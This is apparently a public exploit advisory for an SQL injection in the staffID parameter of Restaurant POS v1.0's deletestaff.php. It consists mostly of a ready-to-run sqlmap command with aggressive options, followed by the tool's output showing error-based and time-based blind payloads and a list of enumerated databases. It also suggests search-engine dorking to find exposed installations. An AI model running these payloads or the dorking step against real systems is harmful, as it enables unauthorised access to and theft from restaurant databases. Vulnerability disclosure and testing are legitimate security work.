=============================================================================================================================================
| # Title     : Restaurant POS v1.0 SQL injection Vulnerability                                                                             |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html                                               |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] use payload : admin/deletestaff.php?staffID=1

[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/bangresto-main/admin/deletestaff.php?staffID=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs


[+] ---
   GET parameter 'staffID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
   sqlmap identified the following injection point(s) with a total of 1823 HTTP(s) requests:
---
  Parameter: staffID (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: staffID=1 AND EXTRACTVALUE(5264,CONCAT(0x5c,0x71787a7171,(SELECT (ELT(5264=5264,1))),0x7162787071))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: staffID=1 AND (SELECT 3481 FROM (SELECT(SLEEP(5)))frXm)
---
[22:32:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.30, Apache 2.4.58, PHP
back-end DBMS: MySQL >= 5.1 (MariaDB fork)
[22:32:22] [INFO] fetching database names
[22:32:22] [INFO] starting 7 threads
[22:32:22] [INFO] retrieved: 'bangresto'
[22:32:22] [INFO] retrieved: 'cms'
[22:32:22] [INFO] retrieved: 'phpmyadmin'
[22:32:22] [INFO] retrieved: 'mysql'
[22:32:22] [INFO] retrieved: 'test'
[22:32:22] [INFO] retrieved: 'information_schema'
[22:32:22] [INFO] retrieved: 'performance_schema'
available databases [7]:
[*] bangresto


[*] ending @ 22:32:22 /2024-08-16/

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================